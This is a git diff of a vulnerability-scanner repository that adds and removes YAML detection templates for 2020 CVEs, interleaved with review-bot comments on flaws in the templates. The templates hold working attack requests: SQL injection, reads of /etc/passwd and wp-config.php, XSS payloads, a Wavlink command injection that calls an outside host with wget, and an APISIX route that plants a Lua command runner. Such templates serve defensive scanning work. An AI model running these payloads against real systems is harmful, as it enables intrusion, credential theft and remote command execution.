@@ -1,50 +0,0 @@ -id: CVE-2020-10220 - -info: - name: rConfig 3.9 - SQL Injection - author: ritikchaddha,theamanrawat - severity: critical - description: | - An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter. - remediation: | - Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability. - reference: - - http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-10220 - - http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html - - http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html - - https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-10220 - cwe-id: CWE-89 - epss-score: 0.02204 - epss-percentile: 0.88241 - cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: rconfig - product: rconfig - shodan-query: title:"rConfig" - tags: packetstorm,cve,cve2020,rconfig,sqli -variables: - num: "999999999" - -http: - - method: GET - path: - - "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{md5(num)}}" - - - type: status - status: - - 200 -# digest: 490a00463044022025c2ad051a88a6b55cea4c3cf31cccd7d3fa8db23d6d1808edb65cee78d0e39d02201173ab667317841df855f850217a903c952f0935235f7c8295c84720aed8a757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/cve-2020-11455-4397.yaml b/poc/cve/cve-2020-11455-4397.yaml deleted file mode 100644 index 93fb6d59a5..0000000000 --- a/poc/cve/cve-2020-11455-4397.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2020-11455 - -info: - name: LimeSurvey 4.1.11 - Path Traversal - author: daffainfo - severity: medium - description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. - reference: - - https://www.exploit-db.com/exploits/48297 - - https://www.cvedetails.com/cve/CVE-2020-11455 - tags: cve,cve2020,lfi - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2020-11455 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2020-11530.yaml b/poc/cve/cve-2020-11530.yaml new file mode 100644 index 0000000000..994a6479d0 --- /dev/null +++ b/poc/cve/cve-2020-11530.yaml 
@@ -0,0 +1,48 @@
+id: CVE-2020-11530
+
+info:
+ name: WordPress Chop Slider 3 - Blind SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+ remediation: |
+ Update to the latest version of the WordPress Chop Slider 3 plugin to mitigate the vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/f10cd7d7-6a31-48e5-994c-b100c846001a
+ - https://github.com/idangerous/plugins/tree/master/Chop%20Slider%203/Chop%20Slider%203%20Wordpress
+ - https://idangero.us/
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11530
+ - http://seclists.org/fulldisclosure/2020/May/26
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-11530
+ cwe-id: CWE-89
+ epss-score: 0.66684
+ epss-percentile: 0.97612
+ cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: idangero
+ product: chop_slider
+ framework: wordpress
+ tags: wpscan,seclists,cve,cve2020,sqli,wordpress,wp-plugin,wp,chopslider,unauth
+
+http:
+ - raw:
+ - |
+ @timeout 10s
+ GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(content_type, "application/javascript")'
+ - 'contains(body, "$(document).ready(function()")'
+ condition: and
+# digest: 4a0a0047304502205f80ae25c4c4f40c8fc31f0a182a3ec201c3da9a7df2d49628e3684b29ca257a022100a5dd6be779da0df34c5dbac2ae45a8ec11039067c90fb8983f2037bc261c97e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-11738(1).yaml b/poc/cve/cve-2020-11738(1).yaml
new file mode 100644
index 0000000000..280607b065
--- /dev/null
+++ b/poc/cve/cve-2020-11738(1).yaml
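Review bot: `duration>=6` is the only entry in the `dsl` list that reflects the injected delay; the status, content-type and body conditions describe any working `get_script/index.php` response, so a slow or heavily loaded host that needs six seconds to answer is reported as injectable at `severity: critical`. A second, unmodified request to the same endpoint as a baseline, with the matcher requiring the delayed response to exceed it by the sleep interval, would remove most of those false positives. At the least I would add a comment above the matcher, `# time-based check: confirm manually, slow hosts can satisfy duration>=6`.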
@@ -0,0 +1,45 @@
+id: CVE-2020-11738
+info:
+ name: WordPress Duplicator plugin Directory Traversal
+ author: dwisiswant0
+ severity: high
+ description: |
+ The issue is being actively exploited, and allows attackers
+ to download arbitrary files, such as the wp-config.php file.
+ According to the vendor, the vulnerability was only in two
+ versions v1.3.24 and v1.3.26, the vulnerability wasn't
+ present in versions 1.3.22 and before.
+ reference:
+ - https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild
+ - https://snapcreek.com/duplicator/docs/changelog/?lite
+ - https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/
+ - http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2020-11738
+ cwe-id: CWE-22
+ tags: cve,cve2020,wordpress,wp-plugin,lfi,kev
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "File Transfer"
+ - "application/octet-stream"
+ - "attachment; filename=\"(wp-config\\.php|passwd)\""
+ condition: and
+ part: header
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"
+ condition: or
+ part: body
diff --git a/poc/cve/cve-2020-11978(1).yaml b/poc/cve/cve-2020-11978(1).yaml
new file mode 100644
index 0000000000..5c7f6e6c5b
--- /dev/null
+++ b/poc/cve/cve-2020-11978(1).yaml
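Review bot: The request block has no `stop-at-first-match: true`, so after the first path has already confirmed the traversal the template still requests `wp-config.php`, and a hit places the site's database credentials in the scanner's stored responses. Adding `stop-at-first-match: true` next to `matchers-condition: and` keeps confirmation to the less sensitive file whenever that is enough. The description states which versions are affected but gives no fix; a `remediation:` line would help whoever receives the finding, and the newer `http:` key used by other templates in this commit would be more consistent than `requests:`.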
@@ -0,0 +1,57 @@ +id: CVE-2020-11978 +info: + name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution + author: pdteam + severity: high + description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. + reference: + - https://github.com/pberba/CVE-2020-11978 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 + - https://twitter.com/wugeej/status/1400336603604668418 + - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-11978 + cwe-id: CWE-77 + metadata: + shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs" + verified: "true" + tags: cve,cve2020,apache,airflow,rce,kev +requests: + - raw: + - | + GET /api/experimental/test HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + + {"conf": {"message": "\"; touch test #"}} + - | + GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 + Host: {{Hostname}} + Accept: */* + extractors: + - type: regex + name: exec_date + part: body + group: 1 + internal: true + regex: + - '"execution_date":"([0-9-A-Z:+]+)"' + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_4, 
"operator":"BashOperator")' + - 'contains(all_headers_4, "application/json")' + condition: and diff --git a/poc/cve/cve-2020-13117-4489.yaml b/poc/cve/cve-2020-13117-4489.yaml new file mode 100644 index 0000000000..bfc0ff9a86 --- /dev/null +++ b/poc/cve/cve-2020-13117-4489.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-13117 +info: + name: Wavlink Multiple AP - Unauthenticated RCE + author: gy741 + severity: critical + description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected. + reference: + - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html + tags: cve,cve2020,wavlink,rce,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13117 + cwe-id: CWE-77 +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Origin: http://{{Hostname}} + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip, deflate + + newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/poc/cve/cve-2020-13121(1).yaml b/poc/cve/cve-2020-13121(1).yaml new file mode 100644 index 0000000000..38db107834 --- /dev/null +++ b/poc/cve/cve-2020-13121(1).yaml 
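Review bot: The CVE-2020-11978 template changes state on the target, since it unpauses `example_trigger_target_dag` and posts a DAG run whose `conf` writes a file, yet its `tags` line carries no `intrusive` marker, unlike the APISIX template added in this same commit. I would change it to `tags: cve,cve2020,apache,airflow,rce,kev,intrusive` so scans that exclude intrusive checks skip it, and say in the description that the DAG is left unpaused afterwards. `matchers-condition: and` is redundant with a single `dsl` matcher. The first `dsl` string appears split or mangled around `"operator":"BashOperator"` as rendered here, so its quoting should be checked in the file itself.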
@@ -0,0 +1,24 @@
+id: CVE-2020-13121
+info:
+ name: Submitty 20.04.01 - Open redirect
+ author: 0x_Akoko
+ severity: medium
+ description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt.
+ reference:
+ - https://github.com/Submitty/Submitty/issues/5265
+ - https://www.cvedetails.com/cve/CVE-2020-13121
+ tags: cve,cve2020,redirect,submitty
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-13121
+ cwe-id: CWE-601
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com'
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
+ part: header
diff --git a/poc/cve/cve-2020-13945-4535.yaml b/poc/cve/cve-2020-13945-4535.yaml
new file mode 100644
index 0000000000..6c740884d6
--- /dev/null
+++ b/poc/cve/cve-2020-13945-4535.yaml
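Review bot: The request and the matcher name different hosts, so this check cannot fire: `path` sends `old=http%3A%2F%2Flexample.com`, while the regex requires `example\.com` directly after the scheme or after a dot-terminated label, and `lexample.com` satisfies neither. Change the path to `'{{BaseURL}}/authentication/login?old=http%3A%2F%2Fexample.com'`, or adjust the regex to the host actually sent. The description says the redirect occurs during an invalid login attempt, and a bare GET may not reach that code path, which is worth confirming against a test instance.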
@@ -0,0 +1,58 @@
+id: CVE-2020-13945
+
+info:
+ name: Apache APISIX's Admin API Default Access Token (RCE)
+ author: pdteam
+ severity: medium
+ description: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-13945
+ - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945
+ - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E
+ - http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2020-13945
+ tags: cve,cve2020,apache,apisix,rce,intrusive
+
+requests:
+ - raw:
+ - |
+ POST /apisix/admin/routes HTTP/1.1
+ Host: {{Hostname}}
+ X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
+ Content-Type: application/json
+
+ {
+ "uri":"/{{randstr}}",
+ "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
+ "upstream":{
+ "type":"roundrobin",
+ "nodes":{
+ "interact.sh:80":1
+ }
+ }
+ }
+
+ - |
+ GET /{{randstr}}?cmd=id HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"action":"create"'
+ - '"script":'
+ - '"node":'
+ condition: and
+
+ - type: status
+ status:
+ - 201
+
+ extractors:
+ - type: regex
+ regex:
+ - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
diff --git a/poc/cve/cve-2020-14181.yaml b/poc/cve/cve-2020-14181.yaml
deleted file mode 100644
index b38cfa0a31..0000000000
--- a/poc/cve/cve-2020-14181.yaml
+++ /dev/null
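Review bot: The route created by the first request is never removed, so a scan that succeeds leaves a command-running route on the gateway under `/{{randstr}}` and the host ends up more exposed than before it was scanned. The template should delete the route it created as a final request, or at least state in `description` that manual cleanup is required after a hit. Both matchers evaluate only the route-creation response (`"action":"create"` and status `201`), and the `id` output of the second request is an extractor, not a matcher, so a result actually means "default admin key accepted". `severity: medium` also sits oddly beside "(RCE)" in the name and the `rce` tag.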
@@ -1,45 +0,0 @@ -id: CVE-2020-14181 - -info: - name: Jira Server and Data Center - Information Disclosure - author: bjhulst - severity: medium - description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0. - remediation: | - Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. - reference: - - https://jira.atlassian.com/browse/JRASERVER-71560 - - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-14181 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2020-14181 - cwe-id: CWE-200 - epss-score: 0.96668 - epss-percentile: 0.99543 - cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: atlassian - product: data_center - shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2020,atlassian,jira,packetstorm - -http: - - method: GET - path: - - '{{BaseURL}}/secure/ViewUserHover.jspa' - - matchers-condition: and - matchers: - - type: word - words: - - 'user-hover-details' - - 'content="JIRA"' - condition: and - - - type: status - status: - - 200 -# digest: 4a0a0047304502204e302056e9c23ccfff1ed6ffb947792cec084d5268e9a8648ea3fb973b1ed700022100d2772006cdf7a1f8fa57862e16164b0a6095027a1567baf94f2d077279a88607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-14408(1).yaml b/poc/cve/cve-2020-14408(1).yaml deleted file mode 100644 index 36f102aa68..0000000000 --- a/poc/cve/cve-2020-14408(1).yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: CVE-2020-14408 -info: - name: Agentejo Cockpit 0.10.2 - Reflected XSS - author: edoardottt - severity: medium - description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-14408 - cwe-id: CWE-79 - reference: - - https://github.com/agentejo/cockpit/issues/1310 - - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408 - metadata: - verified: true - tags: cve,cve2022,cockpit,agentejo,xss,oss -requests: - - method: GET - path: - - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "redirectTo = '/92874';alert(document.domain)//280';" - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2020-14882.yaml b/poc/cve/cve-2020-14882.yaml new file mode 100644 index 0000000000..bad4fad2f7 --- /dev/null +++ b/poc/cve/cve-2020-14882.yaml 
@@ -0,0 +1,46 @@
+id: CVE-2020-14882
+
+info:
+ name: Oracle Weblogic Server - Remote Command Execution
+ author: dwisiswant0
+ severity: critical
+ description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server.
+ remediation: |
+ Apply the latest security patches provided by Oracle to fix the vulnerability.
+ reference:
+ - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
+ - https://www.oracle.com/security-alerts/cpuoct2020.html
+ - https://twitter.com/jas502n/status/1321416053050667009
+ - https://youtu.be/JFVDOIL0YtA
+ - https://github.com/jas502n/CVE-2020-14882#eg
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-14882
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-14882
+ epss-score: 0.97402
+ epss-percentile: 0.99907
+ cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: oracle
+ product: weblogic_server
+ tags: cve,cve2020,oracle,rce,weblogic,oast,kev
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "ADMINCONSOLESESSION"
+
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+# digest: 4a0a0047304502204cf7f23d1f286d27b2baa39b807a5ebc4d3ac2cc58f7e9615bdf52b0e7874fd6022100f1e9c6951b81ca34db0919b3bd819fa078174adf742c5542d46045942d82583c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-19282-4706.yaml b/poc/cve/cve-2020-19282-4706.yaml
deleted file mode 100644
index b89e24088b..0000000000
--- a/poc/cve/cve-2020-19282-4706.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2020-19282 -info: - name: Jeesns 1.4.2 XSS - author: pikpikcu - severity: medium - description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. - reference: - - https://github.com/zchuanzhao/jeesns/issues/11 - - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 - - https://www.seebug.org/vuldb/ssvid-97940 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-19282 - cwe-id: CWE-79 - tags: cve,cve2020,jeesns,xss -requests: - - method: GET - path: - - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - text/html diff --git a/poc/cve/cve-2020-19360-4714.yaml b/poc/cve/cve-2020-19360-4714.yaml new file mode 100644 index 0000000000..260f3ae9f8 --- /dev/null +++ b/poc/cve/cve-2020-19360-4714.yaml 
@@ -0,0 +1,30 @@
+id: CVE-2020-19360
+info:
+ name: FHEM 6.0 - Local File Inclusion
+ author: 0x_Akoko
+ severity: high
+ description: FHEM version 6.0 suffers from a local file inclusion vulnerability.
+ reference:
+ - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md
+ - https://www.cvedetails.com/cve/CVE-2020-19360/
+ - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability
+ - https://emreovunc.com/blog/en/FHEM-v6.0-LFI-Vulnerability-01.png
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2020-19360
+ tags: fhem,lfi,cve,cve2020
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/04
diff --git a/poc/cve/cve-2020-2036-4730.yaml b/poc/cve/cve-2020-2036-4730.yaml
deleted file mode 100644
index fc2519a3aa..0000000000
--- a/poc/cve/cve-2020-2036-4730.yaml
+++ /dev/null
@@ -1,34 +0,0 @@ -id: CVE-2020-2036 -info: - name: Palo Alto Networks Reflected XSS - author: madrobot - severity: high - description: > - A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. - - reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ - tags: cve,cve2020,vpn,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2020-2036 - cwe-id: CWE-79 -requests: - - method: GET - path: - - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" - - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "" - part: body - - type: word - words: - - "text/html" - part: header diff --git a/poc/cve/cve-2020-20982-4740.yaml b/poc/cve/cve-2020-20982-4740.yaml deleted file mode 100644 index 28b76133cf..0000000000 --- a/poc/cve/cve-2020-20982-4740.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: CVE-2020-20982 - -info: - name: Shadoweb Wdja v1.5.1 xss - author: pikpikcu - severity: critical - reference: - - https://github.com/shadoweb/wdja/issues/1 - - https://nvd.nist.gov/vuln/detail/CVE-2020-20982 - tags: cve,cve2020,xss,wdja,shadoweb - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H - cvss-score: 9.60 - cve-id: CVE-2020-20982 - cwe-id: CWE-79 - description: "Cross Site Scripting (XSS) vulnerability in shadoweb wdja v1.5.1, allows attackers to execute arbitrary code and gain escalated privileges, via the backurl parameter to /php/passport/index.php." - -requests: - - method: GET - path: - - "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - condition: and - words: - - '' - - - type: word - part: header - words: - - 'text/html' diff --git a/poc/cve/cve-2020-22211(1).yaml b/poc/cve/cve-2020-22211(1).yaml deleted file mode 100644 index a711842702..0000000000 --- a/poc/cve/cve-2020-22211(1).yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2020-22211 -info: - name: 74cms - ajax_street.php 'key' SQL Injection - author: ritikchaddha - severity: critical - description: | - SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. - reference: - - https://github.com/blindkey/cve_like/issues/13 - - https://nvd.nist.gov/vuln/detail/CVE-2020-22211 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-22210 - cwe-id: CWE-89 - metadata: - fofa-query: app="74cms" - shodan-query: http.html:"74cms" - tags: cve,cve2020,74cms,sqli -variables: - num: "999999999" -requests: - - method: GET - path: - - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23' - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - -# Enhanced by cs on 2022/06/21 diff --git a/poc/cve/cve-2020-22840.yaml b/poc/cve/cve-2020-22840.yaml new file mode 100644 index 0000000000..426073fa00 --- /dev/null +++ b/poc/cve/cve-2020-22840.yaml 
@@ -0,0 +1,39 @@
+id: CVE-2020-22840
+
+info:
+ name: b2evolution CMS <6.11.6 - Open Redirect
+ author: geeknik
+ severity: medium
+ description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+ remediation: |
+ Upgrade b2evolution CMS to version 6.11.6 or later to mitigate the open redirect vulnerability (CVE-2020-22840).
+ reference:
+ - https://github.com/b2evolution/b2evolution/issues/102
+ - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html
+ - https://www.exploit-db.com/exploits/49554
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-22840
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2020-22840
+ cwe-id: CWE-601
+ epss-score: 0.01161
+ epss-percentile: 0.83284
+ cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: b2evolution
+ product: b2evolution
+ tags: packetstorm,edb,cve,cve2020,redirect,b2evolution
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
